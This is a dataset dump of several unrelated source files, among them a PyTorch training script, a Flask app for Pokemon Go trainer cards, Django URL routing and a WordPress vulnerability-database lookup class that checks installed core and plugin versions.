+{"seq_id":"446883388","text":"#!/usr/bin/env python\nimport torch\nimport pdb\nimport numpy as np\nfrom torch.autograd import Variable\nimport os\nimport argparse\nimport datasets\nimport models\nimport pickle\nimport time\nimport monitoring\n#\ndef build_parser():\n parser = argparse.ArgumentParser(description=\"\")\n\n ### Hyperparameter options\n parser.add_argument('--epoch', default=10, type=int, help='The number of epochs we want ot train the network.')\n parser.add_argument('--seed', default=260389, type=int, help='Seed for random initialization and stuff.')\n parser.add_argument('--batch-size', default=10000, type=int, help=\"The batch size.\")\n parser.add_argument('--lr', default=1e-3, type=float, help='learning rate')\n parser.add_argument('--momentum', default=0.9, type=float, help='momentum')\n \n\n ### Dataset specific options\n parser.add_argument('--data-dir', default='./data/', help='The folder contaning the dataset.')\n parser.add_argument('--data-file', default='.', help='The data file with the dataset.')\n parser.add_argument('--dataset', choices=['gene', 'domaingene', 'impute', 'fedomains', 'doubleoutput'], default='gene', help='Which dataset to use.')\n parser.add_argument('--mask', type=int, default=0, help=\"percentage of masked values\")\n parser.add_argument('--missing', type=int, default=0, help=\"number of held out combinations for FE domains\")\n parser.add_argument('--data-domain', default='.', help='Number of domains in the data for triple factemb')\n parser.add_argument('--transform', default=True,help='log10(exp+1)')\n \n # Model specific options\n parser.add_argument('--layers-size', default=[250, 75, 50, 25, 10], type=int, nargs='+', help='Number of layers to use.')\n parser.add_argument('--emb_size', default=2, type=int, help='The size of the embeddings.')\n parser.add_argument('--set-gene-emb', default='.', help='Starting points for gene embeddings.')\n parser.add_argument('--warm_pca', default='.', help='Datafile to use as a PCA warm start for the sample embeddings')\n\n parser.add_argument('--weight-decay', default=1e-5, type=float, help='The size of the embeddings.')\n parser.add_argument('--model', choices=['factor', 'triple', 'multiple','doubleoutput', 'choybenchmark'], default='factor', help='Which model to use.')\n parser.add_argument('--cpu', action='store_true', help='If we want to run on cpu.') # TODO: should probably be cpu instead.\n parser.add_argument('--name', type=str, default=None, help=\"If we want to add a random str to the folder.\")\n parser.add_argument('--gpu-selection', type=int, default=1, help=\"selectgpu\")\n\n\n # Monitoring options\n parser.add_argument('--save-error', action='store_true', help='If we want to save the error for each tissue and each gene at every epoch.')\n parser.add_argument('--make-grid', default=True, type=bool, help='If we want to generate fake patients on a meshgrid accross the patient embedding space')\n parser.add_argument('--nb-gridpoints', default=50, type=int, help='Number of points on each side of the meshgrid')\n parser.add_argument('--load-folder', help='The folder where to load and restart the training.')\n parser.add_argument('--save-dir', default='./testing123/', help='The folder where everything will be saved.')\n\n return parser\n\ndef parse_args(argv):\n\n if type(argv) == list or argv is None:\n opt = build_parser().parse_args(argv)\n else:\n opt = argv\n\n return opt\n\ndef main(argv=None):\n\n opt = parse_args(argv)\n # TODO: set the seed\n seed = opt.seed\n 
    torch.cuda.manual_seed(seed)\n    torch.cuda.manual_seed_all(seed)\n    torch.manual_seed(seed)\n\n    exp_dir = opt.load_folder\n    if exp_dir is None: # we create a new folder if we don't load.\n        exp_dir = monitoring.create_experiment_folder(opt)\n\n    # creating the dataset\n    print (\"Getting the dataset...\")\n    dataset = datasets.get_dataset(opt, exp_dir)\n\n    # Creating a model\n    print (\"Getting the model...\")\n\n    my_model, optimizer, epoch, opt = monitoring.load_checkpoint(exp_dir, opt, dataset.dataset.input_size(), dataset.dataset.additional_info())\n\n    # Training optimizer and stuff\n    criterion = torch.nn.MSELoss()\n\n    if not opt.cpu:\n        print (\"Putting the model on gpu...\")\n        my_model.cuda(opt.gpu_selection)\n\n    # The training.\n    print (\"Start training.\")\n    # monitoring and predictions\n    predictions = np.zeros((dataset.dataset.nb_patient, dataset.dataset.nb_gene))\n    indices_patients = np.arange(dataset.dataset.nb_patient)\n    indices_genes = np.arange(dataset.dataset.nb_gene)\n    xdata = np.transpose([np.tile(indices_genes, len(indices_patients)),\n                          np.repeat(indices_patients, len(indices_genes))])\n    progress_bar_modulo = len(dataset)/100\n    for t in range(epoch, opt.epoch):\n\n        start_timer = time.time()\n\n        if opt.save_error:\n            outfname_g = '_'.join(['gene_epoch', str(t), 'prediction.npy'])\n            outfname_g = os.path.join(exp_dir, outfname_g)\n            outfname_t = '_'.join(['tissue_epoch', str(t), 'prediction.npy'])\n            outfname_t = os.path.join(exp_dir, outfname_t)\n            train_trace = np.zeros((dataset.dataset.nb_gene, dataset.dataset.nb_patient))\n        ### making predictions:\n        nb_proteins = my_model.emb_3.weight.cpu().data.numpy().shape[0]\n        nb_patients = my_model.emb_2.weight.cpu().data.numpy().shape[0]\n        predictions_protein = np.zeros((nb_patients, nb_proteins))\n        patient_embs = my_model.emb_2.weight.cpu().data.numpy()\n\n        for patient in np.arange(nb_patients):\n            new = my_model.generate_datapoint_protein(patient_embs[patient, :], gpu=opt.gpu_selection)\n            new = new.cpu().data.numpy()\n            predictions_protein[patient, :] = new[:, 0]\n        np.save(f'predictions_protein_{t}.npy', predictions_protein)\n\n        for no_b, mini in enumerate(dataset):\n\n            inputs, targets, inputs2, targets2 = mini[0], mini[1], mini[2], mini[3]\n\n            inputs = Variable(inputs, requires_grad=False).float()\n            targets = Variable(targets, requires_grad=False).float()\n            inputs2 = Variable(inputs2, requires_grad=False).float()\n            targets2 = Variable(targets2, requires_grad=False).float()\n\n            if not opt.cpu:\n                inputs = inputs.cuda(opt.gpu_selection)\n                targets = targets.cuda(opt.gpu_selection)\n                inputs2 = inputs2.cuda(opt.gpu_selection)\n                targets2 = targets2.cuda(opt.gpu_selection)\n\n            # Forward pass: Compute predicted y by passing x to the model\n            y_pred = my_model([inputs, inputs2])\n\n            #if opt.save_error:\n            # Log the predicted values per sample and per gene (S.L. 
validation)\n # batch_inputs = mini[0].numpy()\n # predicted_values = y_pred.data.cpu().numpy()\n # train_trace[batch_inputs[:,0],batch_inputs[:,1]] = predicted_values[:,0]\n targets = torch.reshape(targets,(targets.shape[0],1))\n targets2 = torch.reshape(targets2,(targets2.shape[0],1))\n # Compute and print loss\n\n loss1 = criterion(y_pred[0], targets)\n loss2 = criterion(y_pred[1], targets2)\n loss = loss1+loss2\n if no_b % 5 == 0:\n print (f\"Doing epoch {t},examples{no_b}/{len(dataset)}.Loss:{loss.data.cpu().numpy().reshape(1,)[0]}\")\n\n # Saving the emb\n np.save(os.path.join(exp_dir, 'pixel_epoch_{}'.format(t)),my_model.emb_1.weight.cpu().data.numpy() )\n np.save(os.path.join(exp_dir,'digit_epoch_{}'.format(t)),my_model.emb_2.weight.cpu().data.numpy())\n\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n #my_model.generate_datapoint([0,0], opt.gpu_selection)\n #monitoring.save_predictions(exp_dir, predictions)\n\n\n# for i in range(0,xdata.shape[0],1000):\n# #import pdb; pdb.set_trace()\n# inputs = torch.FloatTensor(xdata[i:i+1000,:])\n# inputs = Variable(inputs, requires_grad=False).float()\n# if not opt.cpu:\n# inputs = inputs.cuda(opt.gpu_selection)\n# y_pred = my_model(inputs).float()\n# predictions[inputs.data.cpu().numpy()[:,1].astype('int32'),inputs.data.cpu().numpy()[:,0].astype('int32')] = y_pred.data.cpu().numpy()[:,0]\n # monitoring.dump_error_by_tissue(train_trace, dataset.dataset.data, outfname_t, exp_dir, dataset.dataset.data_type, dataset.dataset.nb_patient)\n # monitoring.dump_error_by_gene(train_trace, dataset.dataset.data, outfname_g, exp_dir)\n\n\n #print (\"Saving the model...\")\n monitoring.save_checkpoint(my_model, optimizer, t, opt, exp_dir)\n\n\n# if opt.make_grid:\n# print ('generating grid and datapoints')\n\n# nb_points = opt.nb_gridpoints\n# x_min = min(my_model.emb_2.weight.data.cpu().numpy()[:,0])\n# y_min = min(my_model.emb_2.weight.data.cpu().numpy()[:,1])\n# x_max = max(my_model.emb_2.weight.data.cpu().numpy()[:,0])\n# y_max = max(my_model.emb_2.weight.data.cpu().numpy()[:,1])\n# x = np.linspace((np.floor(x_min*100))/100,(np.ceil(x_max*100))/100,nb_points)\n# y = np.linspace((np.floor(y_min*100))/100,(np.ceil(y_max*100))/100,nb_points)\n# X, Y = np.meshgrid(x,y)\n# T = []\n# print (f\"I'll be making {(X.shape[0]*X.shape[1])**2} samples for a grid of {X.shape[0]} by {X.shape[1]} \")\n# count = 0\n\n #for ix,iy in zip(X.reshape((X.shape[0]*X.shape[1],)),Y.reshape((Y.shape[0]*Y.shape[1],))):\n # if count%1000==0:\n # print(f'made {count} samples')\n #import pdb; pdb.set_trace()\n #np.save(os.path.join(exp_dir,'generated_patient{}'.format(count)),my_model.generate_datapoint([ix,iy],opt.gpu_selection).data.cpu().numpy())\n# T.append(my_model.generate_datapoint([ix,iy],opt.gpu_selection).data.cpu().numpy())\n# count+=1\n# np.save(os.path.join(exp_dir,'meshgrid_x.npy'),X)\n# np.save(os.path.join(exp_dir,'meshgrid_y.npy'),Y)\n# np.save(os.path.join(exp_dir,'generated_mesh_samples.npy'),T)\n\n\n\n #getting a datapoint embedding coordinate \n\n #inputs = torch.FloatTensor(xdata[i:i+1000,:])\n #inputs = Variable(inputs, requires_grad=False).float()\n #if not opt.cpu:\n # inputs = inputs.cuda(opt.gpu_selection)\n # y_pred = my_model(inputs).float()\n #predictions[inputs.data.cpu().numpy()[:,1].astype('int32'),inputs.data.cpu().numpy()[:,0].astype('int32')] = y_pred.data.cpu().numpy()[:,0]\n #emb_2 = (np.ones(emb_1.shape[0]*2).reshape((emb_1.shape[0],2)))*[0,0]\n\n\n\n\n #TODO: end 
of training, save the model and blah.\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main_doubleoutput.py","file_name":"main_doubleoutput.py","file_ext":"py","file_size_in_byte":11098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"206100587","text":"# -*- coding: utf-8 -*-\n\"\"\"Installer for the collective.transmogrifier package.\"\"\"\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\n\nversion = '1.5.3.dev0'\nlong_description = '\\n\\n'.join([\n open('README.rst').read(),\n open('CHANGES.rst').read(),\n])\n\nsetup(\n name='collective.transmogrifier',\n version=version,\n description='A configurable pipeline, aimed at transforming content for '\n 'import and export',\n long_description=long_description,\n classifiers=[\n 'Framework :: Plone'\n ],\n keywords='content import filtering',\n author='Jarn',\n author_email='info@jarn.com',\n url='http://pypi.python.org/pypi/collective.transmogrifier',\n license='GPL',\n packages=find_packages('src', exclude=['ez_setup']),\n package_dir={'': 'src'},\n namespace_packages=['collective'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'Products.CMFCore',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"168803640","text":"import ipc_pb2\nimport time\nimport sys\nimport win32pipe, win32file, pywintypes\n\n\nimport mmap\nimport struct\ndef GetPipeName():\n\tshm = mmap.mmap(0, 4,'Local\\\\GoopyIPCSharedMemory', access=mmap.ACCESS_READ)\n\tsid = shm.read(4)\n\tsid = struct.unpack(\"I\", sid)\n\tprint(sid)\n#GetPipeName()\n#quit()\n\nhandle = win32file.CreateFile(\n r'\\\\.\\\\pipe\\\\com_google_ime_goopy_2ipc_server',\n win32file.GENERIC_READ | win32file.GENERIC_WRITE,\n 0,\n None,\n win32file.OPEN_EXISTING,\n 0,\n None)\n\n\ndef Send(msg):\n\tpack = msg.SerializeToString()\n\tdata = struct.pack('I', len(pack)+4)\n\twin32file.WriteFile(handle, data+pack)\n\tif msg.reply_mode == 1:\n\t\trc,resp = win32file.ReadFile(handle, 1024)\n\t\tres = ipc_pb2.Message()\n\t\tres.ParseFromString(resp[4:])\n\t\treturn res\n\nclass MyComponet:\n\tdef reg(self):\n\t\t### register componet message\n\t\tmsg = ipc_pb2.Message()\n\t\tmsg.type = 1#0x0204\n\t\tmsg.reply_mode = 1\n\t\tcomponent_info = ipc_pb2.ComponentInfo()\n\t\tcomponent_info.string_id = 'input_in_python'\n\t\tcomponent_info.produce_message.append(0x0020)\n\t\tcomponent_info.produce_message.append(0x0200)\n\t\tcomponent_info.produce_message.append(0x0201)\n\t\tcomponent_info.produce_message.append(0x0204)\n\t\tcomponent_info.produce_message.append(0x0205)\n\t\tmsg.payload.component_info.append(component_info)\n\n\t\trep = Send(msg)\n\t\tprint(rep)\n\t\tself.source = rep.payload.component_info[0].id\n\t\n\tdef showToolBar(self):\n\t\t### show tool bar\n\t\tmsg = ipc_pb2.Message()\n\t\tmsg.type = 0x0204\n\t\tmsg.reply_mode = 1\n\t\tmsg.source = self.source\n\t\tprint(msg)\n\t\trep = Send(msg)\n\t\tprint(rep)\n\n\n\n\tdef hideToolBar(self):\n\t\t### hide tool bar\n\t\tmsg = ipc_pb2.Message()\n\t\tmsg.type = 0x0205\n\t\tmsg.reply_mode = 1\n\t\tmsg.source = self.source\n\t\tprint(msg)\n\t\trep = Send(msg)\n\t\tprint(rep)\n\n\tdef createContext(self):\n\t\tmsg = ipc_pb2.Message()\n\t\tmsg.type = 0x0020\n\t\tmsg.reply_mode = 1\n\t\tmsg.source = self.source\n\t\tprint(msg)\n\t\trep = Send(msg)\n\t\tprint(rep)\n\t\tself.icid = rep.icid\n\tdef attachContext(self):\n\t\tpass\n\ncomp = MyComponet()\ncomp.reg()\ncomp.showToolBar()\nquit()\ncomp.createContext()\ntime.sleep(3)\nquit()\n### show composition ui\nmsg = ipc_pb2.Message()\nmsg.type = 0x0200\nmsg.reply_mode = 1\nmsg.source = source\nprint(msg)\nrep = Send(msg)\nprint(rep)\n\n#while True:\n\nhandle.close()\n","sub_path":"client/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"284754288","text":"from __future__ import print_function\n\nimport os\nimport datetime\nimport numpy as np\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.data\nfrom torch.autograd import Variable\n\nfrom tnn.utils.timer import Timer\nfrom tnn.utils.path import mkdir\nimport tnn.utils.meter as meter_utils\nimport tnn.network.net_utils as net_utils\n\n\nclass Tester(object):\n class TestParams(object):\n exp_name = 'Exp_name'\n\n batch_size = 32\n save_dir = None\n ckpt = None\n gpus = [0]\n\n print_freq = 20\n\n on_start_epoch_hooks = []\n\n def __init__(self, model, test_params, batch_processor, test_data):\n assert isinstance(test_params, self.TestParams)\n self.params = test_params\n self.test_data = test_data\n\n self.batch_processor = batch_processor\n self.batch_per_epoch = len(test_data)\n\n self.batch_timer = Timer()\n self.data_timer = Timer()\n\n mkdir(self.params.save_dir)\n # load model\n ckpt = self.params.ckpt\n if ckpt is None:\n ckpts = [fname for fname in os.listdir(self.params.save_dir) if os.path.splitext(fname)[-1] == '.h5']\n ckpt = os.path.join(\n self.params.save_dir, sorted(ckpts, key=lambda name: int(os.path.splitext(name)[0].split('_')[-1]))[-1]\n ) if len(ckpts) > 0 else None\n\n assert ckpt is not None\n\n meta = net_utils.load_net(ckpt, model)\n if meta[0] >= 0:\n self.last_epoch = meta[0]\n self.lr = meta[1]\n print('load model from {}, last epoch: {}, lr: {}'.format(ckpt, self.last_epoch, self.lr))\n\n self.model = nn.DataParallel(model, device_ids=self.params.gpus)\n self.model = self.model.cuda(device_id=self.params.gpus[0])\n self.model.eval()\n\n def test(self):\n\n for hook in self.on_start_epoch_hooks:\n hook(self)\n\n print('start eval...')\n\n self.data_timer.tic()\n self.batch_timer.tic()\n for step, batch in enumerate(self.test_data):\n inputs, _, saved_for_eval = self.batch_processor(self, batch)\n\n self.data_timer.toc()\n\n output, _ = self.model(*inputs)\n self.batch_timer.toc()\n\n if step % self.params.print_freq == 0:\n data_time = self.data_timer.duration\n batch_time = self.batch_timer.duration\n print('[{}/{}] ({:.2f}/{:.2f}s, fps:{:.1f}, rest: {})'.format(step, self.batch_per_epoch, data_time,\n batch_time,\n self.params.batch_size / batch_time,\n str(datetime.timedelta(\n seconds=int((self.batch_per_epoch - step) * batch_time)))))\n\n self.batch_timer.clear()\n self.data_timer.clear()\n\n yield output, saved_for_eval\n\n self.batch_timer.tic()\n self.data_timer.tic()\n","sub_path":"tnn/network/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"250686137","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 16:40:34 2019\n\n@author: pasca\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 15:32:19 2019\n\n@author: pasca\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 7 23:45:49 2019\n\n@author: pasca\n\"\"\"\n\nimport numpy as np\n\nimport sympy as sp\nimport sympy.abc\n\nimport sys\nsys.path.append('../')\n\nimport ellipsoid_fun\nimport trajectory_to_score_function\nimport h5py\n\n\n\n#%%\n# states\ntarget_state = np.array([2.559085486905914e-01, 1.783308009875336e+00, -1.475035829596991e+00, -1.825982757733474e+00])\ninitial_state = np.array([-2.559085486905914e-01, 1.783308009875336e+00, 1.475035829596991e+00, -1.825982757733474e+00])\nsaddle_state = np.array([0.0000000000E+00, 1.7163920088E+00, 0.0000000000E+00, -2.2021308316E+00])\n\n#%%\n#system parameters\ns=2 #unused\ncontrol_param = 4.9864471442E-01 #control parameter: region with 2 stable equilibria\n\ndist = np.linalg.norm(target_state-initial_state)\neta = np.linalg.norm(target_state-saddle_state)/np.linalg.norm(target_state-initial_state)\n\nc1 = 0.020736\nc2 = 0.018337\nc3 = 0.015617\nc4 = 0.031977\nc5 = 0.036673\nc6 = 0.046850 \nc7 = 0.314802\nl1 = 0.0128616\nl2 = 0.0211107\nl3 = 0.0318615\nl4 = 0.0427787\n\ndef force(v):\n return np.array([c1*v[0]*v[1] + c2*v[1]*v[2] + c3*v[2] *v[3] - l1*v[0],\n c4*v[1]*v[3] + c5*v[0]*v[2] - c1*v[0]*v[0] - l2*v[1] + c7*control_param,\n c6*v[0]*v[3] - (c2+c5)*v[0]*v[1] - l3*v[2],\n -c4*v[1]*v[1] - (c3+c6)*v[0]*v[2] - l4*v[3]])\n \nnoise_matrix = np.array([[0., 0., 0., 0.],\n [0., 1., 0., 0.],\n [0., 0., 0., 0.],\n [0., 0., 0., 0.]])\n \n\n#sympy force matrix\nx1,x2,x3,x4 = sp.abc.symbols('x:4')\n\nforce_matrix = sp.Matrix([c1*x1*x2 + c2*x2*x3 + c3*x3 *x4 - l1*x1,\n c4*x2*x4 + c5*x1*x3 - c1*x1*x1 - l2*x2 + c7*control_param,\n c6*x1*x4 - (c2+c5)*x1*x2 - l3*x3,\n -c4*x2*x2 - (c3+c6)*x1*x3 - l4*x4])\n\n#%%\n#reduction\nsigma = 0.02\ncovariance_matrix_start, quad_form_initial, spectral_radius, level, bound = ellipsoid_fun.ingredients_score_function(force_matrix, initial_state, sigma, noise_matrix=noise_matrix)\ncovariance_matrix_target, quad_form_target, spectral_radius, level, bound = ellipsoid_fun.ingredients_score_function(force_matrix, target_state, sigma, noise_matrix=noise_matrix)\na = np.linalg.eig(np.linalg.inv(covariance_matrix_target))\nspectrum, eigvec = np.linalg.eig(np.linalg.inv(covariance_matrix_start))\n\n#%%\n#score functions\n\ndef score_function_fred(v):\n da = np.linalg.norm(v-initial_state)\n db = np.linalg.norm(v-target_state)\n if da <= db: \n return da/2/db\n else:\n return 1-db/2/da\n \n\ndef score_function_linear(v):\n score = np.sum((target_state-initial_state)*(v-initial_state)) / np.linalg.norm(target_state-initial_state)**2\n if score >=0:\n return score\n else:\n return 1e-5\n\ndef score_function_norm(v):\n x,y=v\n return 1/2*np.sqrt((x+1)**2+1/2*y**2)\n\n\n\ndef score_function_circle_maker(param = 4):\n \"\"\"\n param: decay rate of the exponentials\n \"\"\"\n dist = np.linalg.norm(target_state-initial_state)\n eta = np.linalg.norm(saddle_state-initial_state)/dist\n \n def score_function(v):\n return eta - eta*np.exp(-param*(np.linalg.norm(v-initial_state)/dist)**2)+(1-eta)*np.exp(-param*(np.linalg.norm(v-target_state)/dist)**2)\n return score_function\n\n\n\ndef score_function_ellipsoid_maker(param = 0.05, sigma=0.05):\n \"\"\"\n param: decay rate of the exponentials\n \"\"\"\n eta = 
np.linalg.norm(target_state-saddle_state)/np.linalg.norm(target_state-initial_state)\n \n covariance_matrix_start, quad_form_initial, spectral_radius, level, bound = ellipsoid_fun.ingredients_score_function(force_matrix, initial_state, sigma, noise_matrix=noise_matrix)\n covariance_matrix_target, quad_form_target, spectral_radius, level, bound = ellipsoid_fun.ingredients_score_function(force_matrix, target_state, sigma, noise_matrix=noise_matrix)\n \n def score_function(v):\n return eta - eta*np.exp(-param*quad_form_initial(v))+(1-eta)*np.exp(-param*quad_form_target(v))\n \n return score_function\n\ndef score_function_custom_maker(filename='trajectory.hdf5', decay=0.2):\n \"\"\"\n param: trajectory file with key \"filled_path\"\n decay\n \"\"\"\n with h5py.File(filename, 'r') as file:\n filled_path = file['filled_path'][:]\n file.close()\n score_function = trajectory_to_score_function.score_function_maker(filled_path.T, decay)\n \n return score_function\n\n\n\n\n\n\n\n\n\n\n\n\n#%% \n#tests\ntest = 0\nif test:\n dim = 4\n bound = 3\n resolution = 10\n equilibrium_point = np.zeros(4)\n xi = np.linspace(-bound, bound, resolution)\n grids =np.meshgrid(*[xi+equilibrium_point[i] for i in range(dim)])\n grid = np.array(list(grids))\n \n function_values = np.apply_along_axis(score_function_simexp_ell_param, 0, grid)\n #ell = np.where(np.abs(quad_form_values-level)'.format(self.id)\n\n\n@app.route(\"/\")\ndef hello():\n return render_template('login_page.html')\n\n\n@app.route(\"/handle-request\", methods=['POST'])\ndef handle_request():\n auth_type = str(request.form.get('auth_type'))\n username = str(request.form.get('username'))\n password = str(request.form.get('password'))\n db_id = 0\n try:\n db_id = get_player_details_from_server(auth_type, username, password)\n except pgoapi.AuthException:\n return render_template('login_page.html', error='Authentication Error')\n if not db_id:\n return render_template('login_page.html', error='Authentication Error')\n return make_response(redirect(\"/get-card/{0}\".format(db_id)))\n\n\n@app.route(\"/get-card/\")\ndef get_card(db_id):\n try:\n record_id = HASHIDS.decode(db_id)[0]\n player_object = compute_player_details(record_id)\n except ValueError:\n return render_template('trainer_card.html',\n error='Trainer Card not found')\n tweet = 'Check out my awesome retro Pokemon Go Trainer Card by ' \\\n '@colinwren - {0}'.format(request.url)\n twitter_link = urllib.quote(tweet)\n return render_template('trainer_card.html', player=player_object,\n tweet_text=twitter_link)\n\n\ndef compute_player_details(db_id):\n player_data = TrainerCard.query.get(db_id)\n if not player_data:\n raise ValueError('No player data found')\n account_created = datetime.fromtimestamp(int(player_data.time_ms) / 1000)\n now = datetime.now()\n account_age = (now - account_created).__str__().split('.')[0]\n team = TEAMS[player_data.team]\n return {\n 'username': player_data.username,\n 'account_age': account_age,\n 'level': player_data.level,\n 'pokemon': player_data.pokemon,\n 'team': team\n }\n\n\ndef get_player_details_from_server(auth_type, username, password):\n api = pgoapi.PGoApi()\n # get data\n if api.login(auth_type, username, password):\n api_call = api.get_player().get_inventory().call()\n\n # sort data\n player_data = api_call.get('responses')\\\n .get('GET_PLAYER')\\\n .get('player_data')\n inventory_data = api_call.get('responses')\\\n .get('GET_INVENTORY')\\\n .get('inventory_delta')\\\n .get('inventory_items')\n inventory_items = \\\n [i.get('inventory_item_data') for i 
in inventory_data]\n player_username = player_data.get('username')\n account_created_long = player_data.get('creation_timestamp_ms')\n # currencies = {}\n # for currency in player_data.get('currencies'):\n # currencies[currency.get('name')] = currency.get('amount')\n player_stats = {}\n # items = []\n # pokemon = []\n # pokemon_candy = []\n # pokedex_entries = []\n for item in inventory_items:\n if item.get('player_stats'):\n player_stats = item.get('player_stats')\n # if item.get('pokemon_data'):\n # pokemon.append(item.get('pokemon_data'))\n # if item.get('pokemon_family'):\n # pokemon_candy.append(item.get('pokemon_family'))\n # if item.get('item'):\n # items.append(item.get('item'))\n # if item.get('pokedex_entry'):\n # pokedex_entries.append(item.get('pokedex_entry'))\n # store data\n card = TrainerCard(player_username, account_created_long,\n player_stats.get('level'),\n player_stats.get('unique_pokedex_entries'),\n player_data.get('team', 0))\n db.session.add(card)\n db.session.commit()\n return HASHIDS.encode(card.id)\n return False\n\n\n@app.route('/static/')\ndef send_js(path):\n return send_from_directory(script_path + '/static/', path)\n\n\nif __name__ == \"__main__\":\n app.run(port=8000)\n","sub_path":"app/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"66384570","text":"#!user/bin/python\r\nnum1 = 20\r\nnum2 = 30\r\nnum3 = 35\r\nif (num1>=num2)and (num1>=num3):\r\n greatest=num1\r\nelif(num2>=num3):\r\n greatest=num2\r\nelse:\r\n greatest=num3\r\nprint (\"The greatest number is\",greatest)\r\n\r\n","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"578230053","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom rest_framework import routers\nfrom cal import views\nfrom asg.users import views as uviews\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'events', views.EventViewSet)\nrouter.register(r'pgroups', views.PGroupViewSet)\nrouter.register(r'factions', views.FactionViewSet)\nrouter.register(r'slots', views.SlotViewSet)\nrouter.register(r'entries', views.EntryViewSet)\nrouter.register(r'users', uviews.UserViewSet)\n\nurlpatterns = [\n url(r'^$', TemplateView.as_view(template_name='pages/home.html'), name=\"home\"),\n url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name=\"about\"),\n\n # Django Admin\n url(r'^admin/', include(admin.site.urls)),\n\n # User management\n url(r'^users/', include(\"asg.users.urls\", namespace=\"users\")),\n url(r'^accounts/', include('allauth.urls')),\n\n # Your stuff: custom urls includes go here\n url(r'^api/', include(router.urls)),\n url(r'^', include('cal.urls', namespace='cal')),\n url(r'^nested_admin/', include('nested_admin.urls')),\n\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n url(r'^400/$', 'django.views.defaults.bad_request'),\n url(r'^403/$', 'django.views.defaults.permission_denied'),\n url(r'^404/$', 'django.views.defaults.page_not_found'),\n url(r'^500/$', 'django.views.defaults.server_error'),\n ]\n","sub_path":"config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"179164202","text":"import json\nimport requests\n\nfrom pkg_resources import parse_version\nfrom libs import WordstressScraper\n\n\nclass WPVulnDBLookup(WordstressScraper):\n def __init__(self, *args, **kwargs):\n super(WPVulnDBLookup, self).__init__(*args, **kwargs)\n self.fullinventory()\n self.wpvulndbbaseurl = 'https://wpvulndb.com/api/v2'\n self.vulndbjson = None\n self.jsonout[\"wp_version\"][\"vulnerabilities\"] = []\n self.jsonout[\"confirmed_vulns\"] = {}\n self.jsonout[\"confirmed_vulns\"][\"coreversion\"] = []\n self.jsonout[\"confirmed_vulns\"][\"plugins\"] = []\n self.vulnmajver = None\n self.vulnminver = None\n self.pluginfilename = None\n self.plugindirname = None\n\n def corelookup(self):\n \"\"\"\n :return: dictionary\n \"\"\"\n version = self.wpcoreversion.split('.')\n self.wpcoremajorver = version[0]\n self.wpcoreminorver = version[1]\n self.wpcorepatchver = version[2]\n self.fullurl = '{}/wordpresses/{}{}{}'.format(self.wpvulndbbaseurl, self.wpcoremajorver, self.wpcoreminorver,\n self.wpcorepatchver)\n self.pullvulndata()\n try:\n self.vulndbjson = json.loads(self.r.text)\n\n for vuln in self.vulndbjson[self.wpcoreversion][\"vulnerabilities\"]:\n try:\n if self.versioncheck(_curver=self.wpcoreversion, _fixed_in=vuln[\"fixed_in\"]):\n self.jsonout[\"wp_version\"][\"vulnerabilities\"].append(vuln)\n self.jsonout[\"confirmed_vulns\"][\"coreversion\"].append(vuln)\n except Exception as E:\n self.log.error('Error somewhere in corelookup(). {}'.format(E))\n continue\n except Exception as E:\n self.log.error('Error somewhere in corelookup(). {}'.format(E))\n pass\n return self.jsonout[\"wp_version\"]\n\n def pluginlookup(self):\n \"\"\"\n Notes: wpvulndb is not consistent in how it archives plugin names. \n Sometimes the folder of the plugin should be the api request. \n Other times it is the plugin file name sans .php. \n Some plugins that have 'premium' or 'pro' on them dont seem to return.\n \n Anomaly: https://wpvulndb.com/api/v2/plugins/wordpress-varnish \n vs \n https://wpvulndb.com/api/v2/plugins/wp-varnish\n \n ^ The wp-varnish output has 'latest_version':null where the other has the\n actual version. Need to check for 'null' in current_version output. Also we'll need\n to test both the folder name and the filename.\n \n If wpvulndb wont return anything for the plugin, it will throw status 404\n :return: \n \"\"\"\n\n for inventory_key, inventory_val in self.jsonout[\"plugins\"].items():\n self.jsonout[\"plugins\"][inventory_key][\"wpvulndb\"] = {}\n plg = inventory_val[\"pluginpath\"].split(\"/\")\n if len(plg) == 2:\n self.plugindirname = plg[0]\n self.pluginfilename = plg[1]\n self.fullurl = '{}/plugins/{}'.format(self.wpvulndbbaseurl, self.plugindirname)\n self.log.info('attempting to pull from wpvulndb: {}'.format(self.fullurl))\n if len(plg) == 1:\n self.pluginfilename = inventory_key.replace(' ', '-')\n 